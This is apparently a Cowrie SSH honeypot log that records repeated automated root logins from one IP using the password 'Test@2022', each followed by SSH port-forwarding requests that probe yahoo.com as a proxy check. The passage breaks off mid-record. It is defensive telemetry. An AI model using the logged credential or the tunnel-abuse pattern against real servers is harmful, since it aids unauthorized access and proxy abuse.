{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.140310Z","src_ip":"213.209.150.239","session":"ffaaa4a730a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.375661Z","src_ip":"213.209.150.239","session":"ffaaa4a730a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":18663,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18663","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.424856Z","session":"ffaaa4a730a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.472439Z","src_ip":"213.209.150.239","session":"ffaaa4a730a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":292,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:292","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.609772Z","session":"ffaaa4a730a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.657053Z","src_ip":"213.209.150.239","session":"ffaaa4a730a2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.705019Z","src_ip":"213.209.150.239","session":"ffaaa4a730a2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54046,"dst_ip":"1.2.3.4","dst_port":22,"session":"f22a1a070d00","protocol":"ssh","message":"New connection: 213.209.150.239:54046 (1.2.3.4:22) [session: f22a1a070d00]","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.751387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.752573Z","src_ip":"213.209.150.239","session":"f22a1a070d00"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:56.800260Z","src_ip":"213.209.150.239","session":"f22a1a070d00"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.036236Z","src_ip":"213.209.150.239","session":"f22a1a070d00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":9841,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9841","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.084841Z","session":"f22a1a070d00"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.132392Z","src_ip":"213.209.150.239","session":"f22a1a070d00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":24284,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24284","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.269741Z","session":"f22a1a070d00"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.317037Z","src_ip":"213.209.150.239","session":"f22a1a070d00"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.365173Z","src_ip":"213.209.150.239","session":"f22a1a070d00"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54098,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d70504e8dc8","protocol":"ssh","message":"New connection: 213.209.150.239:54098 (1.2.3.4:22) [session: 4d70504e8dc8]","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.411132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.421333Z","src_ip":"213.209.150.239","session":"4d70504e8dc8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.458576Z","src_ip":"213.209.150.239","session":"4d70504e8dc8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.692940Z","src_ip":"213.209.150.239","session":"4d70504e8dc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":4518,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:4518","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.740946Z","session":"4d70504e8dc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.788126Z","src_ip":"213.209.150.239","session":"4d70504e8dc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":5732,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5732","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.933695Z","session":"4d70504e8dc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:57.981105Z","src_ip":"213.209.150.239","session":"4d70504e8dc8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.030057Z","src_ip":"213.209.150.239","session":"4d70504e8dc8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54147,"dst_ip":"1.2.3.4","dst_port":22,"session":"382edfc234ff","protocol":"ssh","message":"New connection: 213.209.150.239:54147 (1.2.3.4:22) [session: 382edfc234ff]","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.086188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.087533Z","src_ip":"213.209.150.239","session":"382edfc234ff"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.144154Z","src_ip":"213.209.150.239","session":"382edfc234ff"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.427137Z","src_ip":"213.209.150.239","session":"382edfc234ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":2628,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:2628","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.484733Z","session":"382edfc234ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.541546Z","src_ip":"213.209.150.239","session":"382edfc234ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":25724,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25724","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.695007Z","session":"382edfc234ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.752748Z","src_ip":"213.209.150.239","session":"382edfc234ff"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.810371Z","src_ip":"213.209.150.239","session":"382edfc234ff"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54198,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a6ca0fe093f","protocol":"ssh","message":"New connection: 213.209.150.239:54198 (1.2.3.4:22) [session: 8a6ca0fe093f]","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.866133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.867081Z","src_ip":"213.209.150.239","session":"8a6ca0fe093f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:58.923716Z","src_ip":"213.209.150.239","session":"8a6ca0fe093f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.206267Z","src_ip":"213.209.150.239","session":"8a6ca0fe093f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":27433,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27433","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.264037Z","session":"8a6ca0fe093f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.321907Z","src_ip":"213.209.150.239","session":"8a6ca0fe093f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":29737,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:29737","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.479005Z","session":"8a6ca0fe093f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.535750Z","src_ip":"213.209.150.239","session":"8a6ca0fe093f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.593096Z","src_ip":"213.209.150.239","session":"8a6ca0fe093f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54245,"dst_ip":"1.2.3.4","dst_port":22,"session":"77b0879e9cab","protocol":"ssh","message":"New connection: 213.209.150.239:54245 (1.2.3.4:22) [session: 77b0879e9cab]","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.639165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.649312Z","src_ip":"213.209.150.239","session":"77b0879e9cab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 